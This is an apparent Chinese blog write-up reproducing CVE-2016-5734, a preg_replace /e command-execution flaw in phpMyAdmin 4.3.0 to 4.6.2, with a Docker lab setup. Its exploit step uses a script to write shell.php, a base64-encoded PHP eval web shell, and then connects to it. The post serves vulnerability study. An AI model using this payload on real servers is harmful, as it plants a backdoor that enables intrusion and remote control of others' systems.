[CVE-2016-5734]phpmyadmin(4.3.0-4.6.2)命令执行漏洞复现

触发原因:preg_replace函数引发的


触发原理:preg_replace漏洞触发有两个前提:

01:第一个参数需要e标识符,有了它可以执行第二个参数的命令

02:第一个参数需要在第三个参数中的中有匹配,不然echo会返回第三个参数而不执行命令


影响漏洞版本:

4.3.0-4.6.2


漏洞复现:

1、docker搭建 docker-compose up -d
2、漏洞利用代码:python phpmyadmin.py -u root --pwd="root" http://192.168.56.111:8080/ -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4='));"
3、直接连接shell文件


phpmyadmin版本查看:PHPMYADMIN目录下的README文件里面


总结:
1、pre_replace引发的漏洞在PHP版本4.3.0-5.4.6中能触发,PHP 5.4.7后就不行了
2、影响PhpMyAdmin版本为 4.3.0 - 4.6.2


漏洞分析网址:https://www.waitalone.cn/phpmyadmin-preg_replace-rce.html


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值